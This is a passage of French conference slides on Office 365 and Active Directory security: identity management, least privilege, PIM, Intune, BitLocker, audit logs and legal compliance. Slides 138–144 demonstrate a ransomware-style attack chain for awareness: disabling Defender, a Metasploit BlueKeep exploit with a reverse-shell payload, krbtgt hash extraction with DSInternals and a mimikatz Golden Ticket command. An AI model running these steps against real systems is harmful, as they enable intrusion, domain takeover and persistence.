• Provision : création d’une entrée dans un connecteur space à partir d’un objet de la
Metaverse.
Cette opération nécessite l’écriture d’une Metaverse Rule.
Cette dernière est une DLL qui doit être écrite en VBNET ou en C#.
• Import Attributes Flow (IAF) : application des règles de synchronisation connecteur space
Metaverse.
Les règles de transformation complexes nécessitent le développement d’une Rule Extension.
Cette dernière est une DLL écrite en VBNET ou en C#.
• Export Attributes Flow (EAF) : application des règles de synchronisation connecteur space
Metaverse.
Les règles de transformation complexes nécessitent le développement d’une Rule Extension.
Cette dernière est une DLL écrite en VBNET ou en C#.
G
106. Azure AD Access Package
• Permet de créer des groupements de ressources.
• Les utilisateurs demandent l’accès aux Access Package avec / sans
approbation.
• Portail de demande : https://myaccess.microsoft.com
• Licences Azure AD Premium P2 requis.
G Guillaume Mathieu & @SP_twit #MWCP19
107. Azure AD Access Review
• Permet de certifier les accès des utilisateurs.
• Licences Azure AD Premium P2 requis.
G Guillaume Mathieu & @SP_twit #MWCP19
108. En résumé
• Sans EMS :
• Utiliser les étiquettes de confidentialités et faites les utiliser (peut nécessiter EMS)
• Gérer finement les utilisateurs externes
• Désactiver les forward de mails
• Créer, modifier, supprimer les identités et les comptes utilisateurs associés avec
MIM 2016Synchronization Service (licence Windows Server requise).
• Avec EMS :
• Utiliser Microsoft Cloud App Security pour détecter le Shadow IT (applications
SaaS non autorisées).
• Créer, modifier, supprimer les identités et les comptes utilisateurs associés avec
MIM 2016 (avec le portail MIM).
• Certifier les accès de vos utilisateurs avec Azure AD Access Review.
• Gérer l’accès à vos ressources avec Azure AD Access Package.
• Insider Risk Management à venir
Guillaume Mathieu & @SP_twit #MWCP19G
110. Cet homme était admin SharePoint
S Guillaume Mathieu & @SP_twit #MWCP19
111. La menace IT
S Guillaume Mathieu & @SP_twit #MWCP19
Source : Haystax Insider threat report 2019
112. POLP – Principe de moindre privilèges appliqué à
l’admin M365
Meilleures sécurité (Snowden n’avait besoin que de faire
des backups)
Minimisation de la surface d’attaques extérieures
Limitation de la propagation des virus
Guillaume Mathieu & @SP_twit #MWCP19S
113. Recommandations générales
Guillaume Mathieu & @SP_twit #MWCP19
• Comptes administration nominatifs.
• De 2 à 4 comptes d’admin généraux MAX
• Compte(s) brise-glace (20+ chars mdp, renouvellement de MDP
après usage et sur base périodique).
• Machines dédiées pour utiliser les comptes admin
• MFA/Passwordless obligatoire
• Délégation de droits selon le principe du moindre privilège.
G
114. Principaux rôles d’administration
Guillaume Mathieu & @SP_twit #MWCP19S
• Administrateur des données de conformité (eDiscovery)
• Administrateur global
• Administrateur de sécurité
• Administrateur de rôle privilégié
• Administrateur d’utilisateurs
• Administrateur Exchange
• Administrateur SharePoint
• Administrateur Teams
• Administrateur du support technique (réinitialisation de mots de passe)
• Administrateur de facturation
115. Liste des comptes avec des rôles à forts privilèges
Guillaume Mathieu & @SP_twit #MWCP19S
116. Liste des comptes avec des rôles à forts privilèges
Guillaume Mathieu & @SP_twit #MWCP19S
PS > #Requires AzureAD or AzureADPreview module
PS > Connect-MsolService
PS > Get-MsolRole | %{ $roleName = $_.Name; Get-MsolRoleMember
-RoleObjectId $_.ObjectId | select DisplayName, EmailAddress, @{Name =
'O365Role'; Expression = {$roleName}}}
117. Azure AD Privileged Identity Management (PIM)
• Licences Azure AD Premium P2
• Just In Time Access : les administrateurs doivent demander un accès
temporaire aux rôles à fort privilèges.
Guillaume Mathieu & @SP_twit #MWCP19G
118. Office 365 Privileged Access Management
• Complémentaire avec PIM
• Exchange Online uniquement.
• Permet de bloquer des commandes comme Search-Mailbox pour des
administrateurs de type Organization Management.
120. Auditer les actions admins Exchange
• EAC > Gestion de conformité > Audit > Exécuter un rapport d’accès
aux BAL par les non propriétaires
S Guillaume Mathieu & @SP_twit #MWCP19
121. En résumé
• Sans EMS :
• POLP
• Création d’alertes
• Audit des logs
• Avec EMS :
• Mise en œuvre d’Azure AD Privileged Identity Management (PIM)
• Mise en œuvre d’Office 365 Privileged Access Management
Guillaume Mathieu & @SP_twit #MWCP19
123. Vol ou perte de terminal
Guillaume Mathieu & @SP_twit #MWCP19G
124. Elévation de privilèges → administrateur local
G
• Comment devenir
administrateur local
sur une machine
non chiffrée ?
125. Elévation de privilèges → administrateur du domaine
G
• Comment devenir
administrateur du
domaine quand on
est administrateur
local d’une
machine ?
126. BitLocker avec sauvegarde des clés dans Azure AD
G
Forcer avec Intune :
https://blog.ctglobalservices.com/windows-client/mas/how-to-manage-bitlocker-on-a-azure-ad-joined-
windows-10-device-managed-by-intune/#post/0
127. MDM / MAM
• System Center Configuration Manager
(SCCM)
• « vieux »
• Pour Windows
• Part de la suite System Center
• Intégrable dans Intune
• MDM pour O365
• Inclue dans O365 suscriptions
• Compatible iOS, Andoid, Windows
• Security policies (password requirement)
• Remote wipe
S Guillaume Mathieu & @SP_twit #MWCP19
• Microsoft Intune
• MDM complet
• Inclue dans EMS ou à part
• Fait MDM pour O365
• + Mac OS
• + Déploiement d’Apps
• + In App policies (retrict copie
/coller)
128. ActiveSync pour la suppression des terminaux à
distance par l’admin
• Centre d’administration Exchange Online
• > Destinataire
• > <user>
• > Périphériques mobiles
• > Afficher les détails
• > <device>
• > Effacer les données
S Guillaume Mathieu & @SP_twit #MWCP19
PS > Get-MobileDevice -Mailbox <user> | select Id
PS > Clear-MobileDevice -Identity <device Id> -NotificationEmailAddresses
"admin@contoso.com" # -AccountOnly pour seulement la BAL
129. ActiveSync pour la suppression des terminaux à
distance par l’utilisateur
• Depuis interface Outlook > Paramètres > Afficher tous
les paramètres d’Outlook
• Général > Appareils mobiles > <appareil> > Effacer
S Guillaume Mathieu & @SP_twit #MWCP19
131. Ajout de périphérique manuellement
• L’auto enroll (ajout automatique de périphérique lors de l’ajout du
compte sur la machine –
nécessite Azure AD Premium P1)
• Paramètres
> Accès Professionnel ou Scolaire
> <compte utilisateur>
> S’inscrire uniquement à la gestion
des péripériques
S Guillaume Mathieu & @SP_twit #MWCP19
132. Suppression de terminal à distance avec Intune
• Portail Azure > Intune > Rechercher un appareil > <appareil> >
Réinitialiser
S
134. Microsoft EndPoint Manager
• Vue consolidée de tous les périphériques
• Score de productivité
• Recommandations de sécurité
• https://devicemanagement.microsoft.com
S Guillaume Mathieu & @SP_twit #MWCP19
135. Suppression de terminal à distance depuis
EndPoint Manager
• https://devicemanagement.microsoft.com/
S
136. En résumé
• Sans EMS :
• Suppression des données à distance via MDM
• Bitlocker les disques avec sauvegarde des clés dans Active Directory ou Azure
Active Directory
• Avec EMS :
• Suppression des données à distance via Intune
Guillaume Mathieu & @SP_twit #MWCP19
138. Fonctionnement d’un cryptolocker
• La méthodologie :
• Une faille applicative pour devenir administrateur local (comme BlueKeep)
• Elévation des privilèges pour se propager sur des machines seines avec un
outil comme Mimikatz.
• Chiffrement des données.
• Génération d’un Golden Ticket pour revenir si besoin avec DSINternals et
Mimikatz.
G Guillaume Mathieu & @SP_twit #MWCP19
139. Metasploit : exploitation de la faille Bluekeep
G Guillaume Mathieu & @SP_twit #MWCP19
• Téléchargement de Metasploit :
• Gratuit pour la version communauté :
• https://github.com/rapid7/metasploit-
framework/wiki/Nightly-Installers
• La procédure avec Metasploit :
• https://headleaks.com/2019/11/11/how-hackers-exploit-
bluekeep-vulnerability-to-install-cryptominer-on-windows-
servers-YWEvR1Z3eCtWS0ZpZllxc2ZzUDdyQT09
• Procédures d’attaque :
Désactiver Windows Defender (via GPEDIT).
Lancer l’outil C:metasploit-
frameworkbinmsfconsole.bat
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set RHOSTS 192.168.140.129
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.140.127
set LPORT 4444
show targets
set target 6
exploit
140. Metasploit : exploitation de la faille Bluekeep
G Guillaume Mathieu & @SP_twit #MWCP19
L’exploit actuel est en cours
d’amélioration.
A venir → un invite de
commande en tant que
System.
142. Générer un Golden Ticket - DSInternals
• Module PowerShell DSInternals :
• https://www.powershellgallery.com/packa
ges/DSInternals/2.16.1
• https://www.dsinternals.com/en/list-of-
cmdlets-in-the-dsinternals-module/
• Utilisation « standard » du protocole MS-
DRSR (Directory Replication Service (DRS)
Remote)
• Permet de lire / modifier le LMHASH et le
NTHASH d’un compte.
• Installation simplifiée (PowerShell V5) :
Install-Module DSInternals
G Guillaume Mathieu & @SP_twit #MWCP19
143. Générer un Golden Ticket - DSINternals
• Avec DSInternals - domaine : idday.intra - contrôleur de domaine : iddaydc1.idday.intra
Taper la commande suivante : Get-ADReplAccount -SamAccountName krbtgt -Domain idday
-Server IDDAYDC1.idday.intra
G Guillaume Mathieu & @SP_twit #MWCP19
144. Générer un Golden Ticket - Mimikatz
mimikatz.exe "privilege::debug" "kerberos::golden
/admin:administrator /domain:idday.intra /id:4000 /sid:S-1-5-21-
3891616466-275351861-3864161629
/krbtgt:118df50a41bca303945583ad11245fce /startoffset:0
/endin:600 /renewmax:10080 /ptt"
G Guillaume Mathieu & @SP_twit #MWCP19
145. Sécuriser son annuaire Active Directory
G
• Mise en oeuvre
d’Azure ATP pour
détecter les
attaques.
146. Bloquer les machine non sûres avec Intune
• Créer une stratégie Intune
https://devicemanagement.microsoft.com/
• Sécurité du point de terminaison > Conformité de l’appareil >
Stratégie > Créer une stratégie
Guillaume Mathieu & @SP_twit #MWCP19S
148. Protection contre les cryptolocker
• https://support.office.com/fr-fr/article/sauvegarder-vos-documents-images-et-
dossiers-de-bureau-avec-onedrive-d61a7930-a6fb-4b95-b28a-6552e77c3057
G
149. Architecte sans AD / serveur de fichiers / WSUS
• Pour les sociétés < 50 personnes :
• Azure AD comme annuaire d’entreprise et annuaire applicatif
• Intune comme alternative aux stratégies de groupe :
https://oliverkieselbach.com/2019/07/18/intune-policy-processing-on-windows-
10-explained/
• SharePoint Online / OneDrive for Business comme alternative aux serveurs de
fichiers - SharePoint Migration tools : https://docs.microsoft.com/en-
us/sharepointmigration/fileshare-to-odsp-migration-guide
• Windows Update for Business / Delivery Optimization comme alternative à WSUS
• Autopilot comme alternative aux outils de déploiement / master
• TeamViewer comme outil de prise en main à distance avec interface Intune :
https://www.teamviewer.com/fr/integrations/microsoft-intune
G Guillaume Mathieu & @SP_twit #MWCP19
150. Architecte sans AD / serveur de fichiers / WSUS
G Guillaume Mathieu & @SP_twit #MWCP19
2 portail d’administration pour Intune :
Via le portail Azure AD (Devices et Intune) : https://portal.azure.com
Le portail Microsoft Endpoint Manager admin center : https://devicemanagement.microsoft.com/#home
151. En résumé
• Sans EMS :
• Sécurisation de son annuaire Active Directory
• Outils tiers de détection d’attaque comme Alsid for AD (payant).
• Avec EMS :
• Azure ATP / ATA (équivalent On-Premise).
• Intune pour forcer les machines à être conforme
• Pour les sociétés < 50 personnes : Azure AD Join + Intune + Office 365 (plus
d’AD et de serveurs de fichiers).
Guillaume Mathieu & @SP_twit #MWCP19
153. Export des logs Exchange Online
• Nécessite O365 E5 pour voir l’audit depuis le centre de sécurité et
conformité https://protection.office.com/unifiedauditlog
S Guillaume Mathieu & @SP_twit #MWCP19
PS > Connect-EXOPSSession #Connexion Exchange Online Pshell Module
PS > Search-MailboxAuditLog -Identity <monuser@consoto.com> -LogonTypes
Owner -StartDate 1/1/2019 -EndDate 1/1/2020 -ResultSize 2000 –ShowDetails
PS > Search-MailboxAuditLog -Identity <monuser@consoto.com> -StartDate
$([datetime]::Now.AddDays(-90) -EndDate $([datetime]::Now) –ShowDetails -
ResultSize 2000 | Export-Csv –NoTypeInformation –Path
".MonExportMailBox$(Get-Date -Format 'yyyyMMddhhmmss').csv"
154. Export des logs O365
• Centre Sécurité et Conformité
> Rechercher > Rechercher
dans le journal d’audit
• Export Excel limité à 50K events, 3K chars
S Guillaume Mathieu & @SP_twit #MWCP19
PS > Connect-EXOPSSession #Exchange Online Powershell module
PS > $beginDate = [datetime]::Now.AddDays(-90)
PS > $endDate = [datetime]::Now
PS > $sessionId = "FullExport$(Get-Date -Format 'yyyyMMddhhmmss')”
PS > Do {
$tempResult = Search-UnifiedAuditLog -StartDate $beginDate -EndDate $endDate
-ResultSize 1000 -SessionId $sessionId -SessionCommand ReturnLargeSet
$resultSet += $tempResult
} Until ($tempResult.Count -eq 0)
PS > | Export-Csv –NoTypeInformation –Path ".MonExportMailBox$(Get-Date -
Format 'yyyyMMddhhmmss').csv"
155. La sauvegarde des données
• Stratégie de sauvegarde : réplication de la données sur plusieurs
centre de données + rétention des données supprimées.
• Sauvegarde Microsoft : 2 fois par jour avec rétention 14 jours (sans
garantie Microsoft).
• Pour retrouver des données supprimer à plus de 14 jours :
Utiliser un outil tiers comme Veeam Backup For Office 365.
S Guillaume Mathieu & @SP_twit #MWCP19
156. Se tester avec le Secure Score
• https://security.microsoft.com/securescore
S Guillaume Mathieu & @SP_twit #MWCP19
157. En résumé
• Sans EMS :
• Export et sauvegarde des logs
• Sauvegarder votre tenant Office 365 avec un outil tiers.
• Evalualer son niveau de sécurité avec le secure score
Guillaume Mathieu & @SP_twit #MWCP19
160. Customer LockBox
• Nécessite licence O365 E5
• Validation de toute action du support
Microsoft aux données Exchange /
SharePoint et OneDrive
• Accès de 12h par défaut
• Tenant admin > Settings >
Security and Privacy>
Customer LockBox
S Guillaume Mathieu & @SP_twit #MWCP19
161. Localisation
• Multi geo capability
(500 users min.
2$/users/mmois)
• Data center FR
S Guillaume Mathieu & @SP_twit #MWCP19
162. Où sont les miennes
• Tenant administration > Paramètres > Profil de l’organisation
S Guillaume Mathieu & @SP_twit #MWCP19
PS > Connect-MsolService
PS > (Get-MsolCompanyInformation).AuthorizedServiceInstances
163. Où sont les miennes?
S Guillaume Mathieu & @SP_twit #MWCP19
164. Chiffrement des communications
• Communications internes O365 : TLS ou IPSec
• Communication O365/client : TLS (SHA 256, clé publique 2048 bits)
S Guillaume Mathieu & @SP_twit #MWCP19
165. Chiffrement au stockage
• 1 ou plusieurs Blobs dans plusieurs Azure Storage (max 64Ko)
• Une clef de chiffrement par fichier (AES 256bits)
• Clefs stockées chiffrées dans la base de données SharePoint qui contient aussi la
carte pour retrouver les Blobs
• Clef de déchiffrement des containers
Azure storage et des clefs dans la base de
données SharePoint dans le Key Store
(ou Azure Key Vault si BYOK)
• Conformité du chiffrement avec FIPS 140-2
• SharePoint DB dans Azure SQL Database elle-même chiffrée par Transparent
Data Encryption
• Disques durs chiffrés par BitLocker
S Guillaume Mathieu & @SP_twit #MWCP19
166. Normes
• Nombreuses normes
• Habilitation Hébergeur
de données de santé FR
• Audit extérieurs
• Accès aux documents
d’audit
S Guillaume Mathieu & @SP_twit #MWCP19
167. Accès aux documents d’audit externes
• https://servicetrust.microsoft.com/
• White papers
• Rapports pen test
• Audits
S Guillaume Mathieu & @SP_twit #MWCP19
168. RGPD
• Contrat compatible
• Nombreuses fonctionnalités pour
conformité (eDiscovery, RMS,
Etiquettes, DLP, etc.)
S Guillaume Mathieu & @SP_twit #MWCP19
169. Télémétrie
• Envoie de données de télémétrie à Microsoft (Office Pro Plus est un
« third party tool » dans les conditions générales de vente)
• Auditable via la Visionneuse de
Données de Diagnostic
• Mise à jour des conditions de ventes
Q1 2020
S Guillaume Mathieu & @SP_twit #MWCP19
170. Patriot Act / SCA
• S’applique uniquement aux données
stockées ou transitant sur sol US
• Patriot Act -> FBI, CIA, NSA, Armée
• SCA -> Justice
• Microsoft a tenu tête des années au DoJ
sur l’extra territorialité du SCA (Stored
Communication Act) jusqu’à la cours
Suprême des USA (cf. Cloud Act plus tard)
S Guillaume Mathieu & @SP_twit #MWCP19
171. Cloud Act
• Sur requête d’un procureur américain (ex:
corruption, commerce avec pays sous embargo)
• Applicabilité extra territoriale
• Si accord bilatéral, opposition de l’hébergeur sous
14 jours possible si :
• Citoyen non américain
• ET va à l’encontre de la législation locale
Conditions générales de vente O365
“Si Microsoft est contrainte de divulguer des Données Client ou des Données à Caractère Personnel aux
pouvoirs publics, elle s’engage à en aviser le Client dans les meilleurs délais et à fournir un exemplaire de
la demande, sauf interdiction légale.”
Guillaume Mathieu & @SP_twit #MWCP19S
173. Sécurité si vous démarrez de zero un tenant
Guillaume Mathieu & @SP_twit #MWCP19S
• Admin MFA
• Users MFA
• Désactivation des
protocole legacy
• MFA pour actions à
privilège
• C’est le futur des
paramètres par
défaut Microsoft
sous 5 ans
174. Buy some remote consulting!
Acheter des journées de conseil à distance !
https://modern-workplace.pro/mwcp-sebastien-paulet